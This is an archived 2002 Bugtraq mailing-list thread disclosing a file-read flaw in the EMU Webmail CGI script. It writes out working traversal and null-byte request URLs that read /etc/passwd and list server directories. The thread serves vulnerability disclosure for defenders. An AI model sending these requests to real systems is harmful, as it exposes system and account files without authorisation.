u can also do this: http://site/emumail.cgi?type=/../../../../../etc/passwd%00 but u cannot do this: http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00 /* * Andreas Constantinides (MegaHz) * Admin of cHp (www.cyhackportal.com) * */ ----- Original Message ----- From: "N|ghtHawk" <nighthawkat_private> To: <bugtraqat_private> Sent: Friday, April 05, 2002 3:10 AM Subject: Re: emumail.cgi > >name : emumail.cgi > >date : 04/04/2002 > >description : EMU Webmail: how to check your email > >from the web. > >severity : Low/average-risk > >homepage : www.emumail.com > > > >Any user can view files on the remote system: > >xxx/PATH/emumail.cgi?type=FILE%00 > > > > > > > >The vendor were contact about that > > > > http://site/emumail.cgi?type=.%00 > > Seems to give the directory index of the current directory. > > http://site/emumail.cgi?type=..%00 > > Seems to give the directory index of ../ > > -- > N|ghtHawk > http://www.hackers4hackers.org > > > >
This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 20:12:50 PDT